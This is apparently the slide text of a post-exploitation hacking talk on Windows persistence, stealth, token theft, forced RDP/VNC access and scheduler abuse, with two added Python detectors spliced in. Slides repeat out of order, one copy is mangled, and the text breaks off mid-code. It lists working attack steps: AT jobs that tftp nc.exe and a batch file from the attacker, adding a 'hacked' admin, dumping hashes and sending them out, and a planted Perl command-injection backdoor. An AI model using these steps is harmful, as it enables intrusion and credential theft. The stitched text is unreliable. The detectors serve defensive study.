    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth Evading Detection
• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ userpassword /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from the command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder:
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
  – No command-line way of modifying the system, need a GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT
  – Flow
    • Establish an authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i us GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
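Seen from the blue side, the sc chain on slide 50, the AT flow on slides 58 to 61 and the Mass* tools above share one shape in process-creation telemetry: a single account drives many hosts through net use \\host\ipc$, at \\host and sc \\host. The detector below is an added example, not one of the talk's tools; the records it consumes and the thresholds it applies are constructed stand-ins for a real process-creation audit feed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Constructed sample records (time, host the command ran on, account, command
# line): one operator on WS01 working three hosts the way slides 50 and 58-61
# describe, plus ordinary helpdesk activity on WS02 that must not fire.
SAMPLE_EVENTS: List[Tuple[str, str, str, str]] = [
    ("2007-08-01T12:00:00", "WS01", "CORP\\jdoe", r"net use \\192.168.1.1\ipc$ * /user:CORP\svc_backup"),
    ("2007-08-01T12:00:05", "WS01", "CORP\\jdoe", r"net time \\192.168.1.1"),
    ("2007-08-01T12:00:10", "WS01", "CORP\\jdoe", r"at \\192.168.1.1 12:02pm tftp -i 192.168.1.200 GET e.bat"),
    ("2007-08-01T12:01:00", "WS01", "CORP\\jdoe", r"net use \\192.168.1.2\ipc$ * /user:CORP\svc_backup"),
    ("2007-08-01T12:01:05", "WS01", "CORP\\jdoe", r"sc \\192.168.1.2 config clipsrv start= auto"),
    ("2007-08-01T12:01:06", "WS01", "CORP\\jdoe", r"sc \\192.168.1.2 start clipsrv"),
    ("2007-08-01T12:02:00", "WS01", "CORP\\jdoe", r"net use \\192.168.1.3\ipc$ * /user:CORP\svc_backup"),
    ("2007-08-01T12:02:10", "WS01", "CORP\\jdoe", r"at \\192.168.1.3 12:04pm e.bat"),
    ("2007-08-01T13:15:00", "WS02", "CORP\\helpdesk", r"net use \\FILESRV\ipc$ /user:CORP\helpdesk"),
    ("2007-08-01T13:16:00", "WS02", "CORP\\helpdesk", r"sc \\FILESRV query spooler"),
]

REMOTE_IPC = re.compile(r"^net\s+use\s+\\\\([^\\\s]+)\\ipc\$", re.I)
REMOTE_AT = re.compile(r"^at\s+\\\\([^\\\s]+)\s", re.I)
REMOTE_SC = re.compile(r"^sc\s+\\\\([^\\\s]+)\s+(config|start)\s+(\S+)", re.I)
# Services the talk re-enables to get clipbook/psexec and Remote Desktop back.
WATCHED_SERVICES = {"netdde", "netddedsdm", "clipsrv", "termservice"}


@dataclass
class Finding:
    kind: str
    src_host: str
    user: str
    target: str
    evidence: str


def detect(events, window=timedelta(minutes=10), mass_threshold=3) -> List[Finding]:
    """Three rules taken from the chains on the slides:
    1. an `at \\host` job scheduled shortly after `net use \\host\ipc$` by
       the same actor (the scheduler used as the remote shell);
    2. `sc \\host config|start` on a service the talk re-enables;
    3. one actor driving many distinct hosts this way (mass automation)."""
    findings: List[Finding] = []
    ipc_seen: Dict[Tuple[str, str], Dict[str, datetime]] = defaultdict(dict)
    targets: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for ts, host, user, cmd in events:
        t = datetime.fromisoformat(ts)
        actor = (host, user)
        if m := REMOTE_IPC.match(cmd):
            target = m.group(1).lower()
            ipc_seen[actor][target] = t
            targets[actor].add(target)
        elif m := REMOTE_AT.match(cmd):
            target = m.group(1).lower()
            targets[actor].add(target)
            seen = ipc_seen[actor].get(target)
            if seen is not None and t - seen <= window:
                findings.append(Finding("remote_at_after_ipc", host, user, target, cmd))
        elif m := REMOTE_SC.match(cmd):
            target, service = m.group(1).lower(), m.group(3).lower()
            targets[actor].add(target)
            if service in WATCHED_SERVICES:
                findings.append(Finding("remote_service_reenable", host, user, target, cmd))
    for (host, user), hosts in targets.items():
        if len(hosts) >= mass_threshold:
            findings.append(Finding("mass_remote_admin", host, user, ",".join(sorted(hosts)),
                                    f"{len(hosts)} distinct hosts driven over IPC$/at/sc"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.kind:24} {f.src_host} {f.user} -> {f.target}: {f.evidence}")
```

The window and threshold are the tuning knobs: legitimate admins also use sc and at remotely, so the signal is the combination with a fresh IPC$ session and the fan-out across hosts, not any one command.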
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs. FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables ClipBook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the system control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the vnc files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command-line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
  – Establish authenticated session
  – Determine the time on the target
  – Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i use GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
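Added here as a defender-side counterpart to the Feature Modification slides (49 to 54) and the Abusing The Scheduler slides (57 to 61), and not part of the talk: a small rule set run over constructed, simplified Windows event records that flags the re-enabled services, the scheduler-as-shell jobs, the fDenyTSConnections flip, the VNC service install and the net user / net localgroup pair from e.bat. The event IDs are the real Windows ones; the record layout, names and values are constructed.

```python
import re

# Services the Feature Modification slides switch back on with
# "sc config <svc> start= auto", plus Terminal Services itself.
REENABLED_SERVICES = {"netdde", "netddedsdm", "clipsrv", "termservice"}
# Transfer tools and batch artefacts from the AT-driven "e.bat" flow.
STAGING_RE = re.compile(r"(tftp|\bftp\b|\.bat\b|nc\.exe)", re.I)
# Legacy AT jobs get auto-generated task names At1, At2, ...
AT_JOB_RE = re.compile(r"^At\d+$")

# Constructed, simplified event records. The IDs are the real Windows ones
# (System 7040/7045, Security 4657/4698/4720/4732); the fields are a flattened
# stand-in for the EVTX event data, and every value here is made up.
CONSTRUCTED_EVENTS = [
    {"id": 7040, "service": "ClipSrv", "old": "disabled", "new": "auto start"},
    {"id": 7040, "service": "NetDDE", "old": "disabled", "new": "auto start"},
    {"id": 7040, "service": "Spooler", "old": "auto start", "new": "demand start"},
    {"id": 4698, "task": "At1", "user": "SYSTEM", "command": "tftp -i 10.9.8.7 GET e.bat"},
    {"id": 4698, "task": "At2", "user": "SYSTEM", "command": "e.bat"},
    {"id": 4698, "task": "NightlyBackup", "user": "SYSTEM", "command": "backup.exe /full"},
    {"id": 4657, "key": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value": "fDenyTSConnections", "old": "1", "new": "0"},
    {"id": 7045, "service": "VNC Server", "image": r"C:\temp\winvnc.exe"},
    {"id": 4720, "account": "hacked"},
    {"id": 4732, "group": "Administrators", "member": "hacked"},
]


def detect(events):
    """Run the rules over an event sequence and return (rule, detail) findings.

    Each rule matches one trick from the slides. The account rule keeps state
    so that a 4720 (user created) followed by a 4732 (added to Administrators)
    for the same name is reported once, as the pair the e.bat example produces.
    """
    findings, created = [], set()
    for ev in events:
        eid = ev["id"]
        if (eid == 7040 and ev["service"].lower() in REENABLED_SERVICES
                and ev["old"].startswith("disabled")):
            findings.append(("service_reenabled",
                             f"{ev['service']}: {ev['old']} -> {ev['new']}"))
        elif eid == 4698 and AT_JOB_RE.match(ev["task"]):
            tag = " [file transfer / batch]" if STAGING_RE.search(ev["command"]) else ""
            findings.append(("at_job", f"{ev['task']} as {ev['user']}: {ev['command']}{tag}"))
        elif (eid == 4657 and ev["value"].lower() == "fdenytsconnections"
                and ev["new"] == "0"):
            findings.append(("rdp_enabled_registry",
                             f"{ev['key']}\\{ev['value']}: {ev['old']} -> 0"))
        elif eid == 7045 and "vnc" in (ev["service"] + ev["image"]).lower():
            findings.append(("vnc_service_installed", f"{ev['service']} ({ev['image']})"))
        elif eid == 4720:
            created.add(ev["account"].lower())
        elif (eid == 4732 and ev["group"].lower() == "administrators"
                and ev["member"].lower() in created):
            findings.append(("new_local_admin",
                             f"{ev['member']} created, then added to {ev['group']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(CONSTRUCTED_EVENTS):
        print(f"{rule:22} {detail}")
```

The Spooler start-type change and the NightlyBackup task are left in as the benign noise these rules have to ignore; 4657 only fires at all when a SACL with audit entries sits on the Terminal Server key, which ties back to slide 37.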
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to
    • All the people from offensivecomputing, nologin, uninformed, IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 15
Persistence
Slide 16
A word on Stealth vs. Persistence
  – In the old days a rootkit helped you maintain root
  – Today rootkits are all about hiding
  – These two concepts still go hand in hand
Slide 17
Persistence
• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1-shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter
Slide 18
Persistence
• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use?
    • FUZZY – OS / Environment / Target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace
Slide 19
Persistence
• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.
Slide 20
Persistence
• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in
Slide 21
Persistence
• Leveraging existing persistent admin access
• Nagios checks
• Attack Configuration Management
  – Cfengine
  – SMS
  – Automated Patching Systems ("patch" them with our trojans)
• GUIs
• Tool distribution
Slide 22
Persistence
• Example
• Machine has VNC installed
• Replace installed VNC with vulnerable version
  – Authentication bypass
• Copy registry password so target doesn't realize
• Persistence with no backdoors or rootkits to get detected
Slide 23
Persistence
• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
    • Focus on vague intent
    • Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs
Slide 24
Persistence
• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally
<input type="hidden" name="Lang">
• Edit web app and tie vulnerable Perl code to form field input
if (defined $hidden_field) { open($filename, ">$hidden_field") }
• Craft a POST including the hidden field
Slide 25
Persistence
• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
Slide 26
Persistence
• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42, then execute contents of Address field
  – URL-encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation
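As a code-review counterpart to the hidden-field backdoor on slides 24 to 27, here is an added example (not from the talk) that scans Perl CGI source for the two-argument open() sink the slide plants, where an interpolated path lets a leading or trailing "|" turn the open into a command, and lists hidden form fields so the reviewer can tie them to what the script reads. The CGI source and form it runs over are constructed.

```python
import re

# Two-argument open(): open(HANDLE, EXPR) with no separate mode argument. The
# first/last characters of EXPR ("<", ">", ">>", "|") select the mode, so when
# EXPR interpolates request data the requester can turn a file open into a
# pipe open, which is what the slide's lang=|cmd| URL relies on.
TWO_ARG_OPEN = re.compile(
    r"""\bopen\s*\(\s*
        (?P<handle>(?:my\s+)?\$?\w+)\s*,\s*                 # bareword or lexical handle
        (?P<expr>"[^"]*"|'[^']*'|\$[\w>-]+(?:\([^)]*\))?)   # the single remaining argument
        \s*\)""",
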